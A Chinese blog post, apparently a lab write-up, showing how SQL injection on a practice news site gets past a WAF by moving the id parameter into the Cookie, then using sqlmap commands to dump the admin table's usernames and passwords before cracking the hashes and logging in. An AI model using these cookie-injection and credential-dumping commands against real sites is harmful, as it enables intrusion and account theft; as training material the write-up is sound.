sql注入之绕过waf(cookie注入)

我们看一下题目:

网址:http://kypt8004.ia.aqlab.cn/index.asp

 

点击一条新闻,查看相关信息

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171

 

 进行简单注入测试

 

 

 

 我们再来看一下该表的列数

进过测试,当order by =11时,会显示数据库错误,可想该表的列数为10列,如图所示。

 

 当我们使用union关键字再一次进行测试的时候,waf又将其过滤掉

 

 所以到这里,我们可以想到,waf设置有一个黑名单过滤问题

(在此处,还调试了大小写编码,一些其他绕过方式,但是都没成功)

所以我们在这里使用Cookie绕过。

使用Burp抓包,改一下Cookie看一下效果

抓住一个包:

 

 修改Cookie

 

 我们发现,只是爆出错误,并没有waf提示,所以绕过成功

我们可以sqlmap跑一下数据

 

 

 

 跑一下表(tables)

sqlmap>sqlmap.py -u "http://kypt8004.ia.aqlab.cn/shownews.asp?" --cookie="id=171" --level 2 --tables

 

 跑出admin表的列

 sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column

 

 接下里,我们跑一下username和password

 sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password

 

 

 我们在MD5解密后,在在进行一次扫描网站

 

 我们现在去扫描网站,在进行一次登录。(使用御剑)

 

 找到一个登录,进行登录

 

 成功。

posted @ 2022-02-18 17:42  我就去睡觉  阅读(240)  评论(0编辑  收藏  举报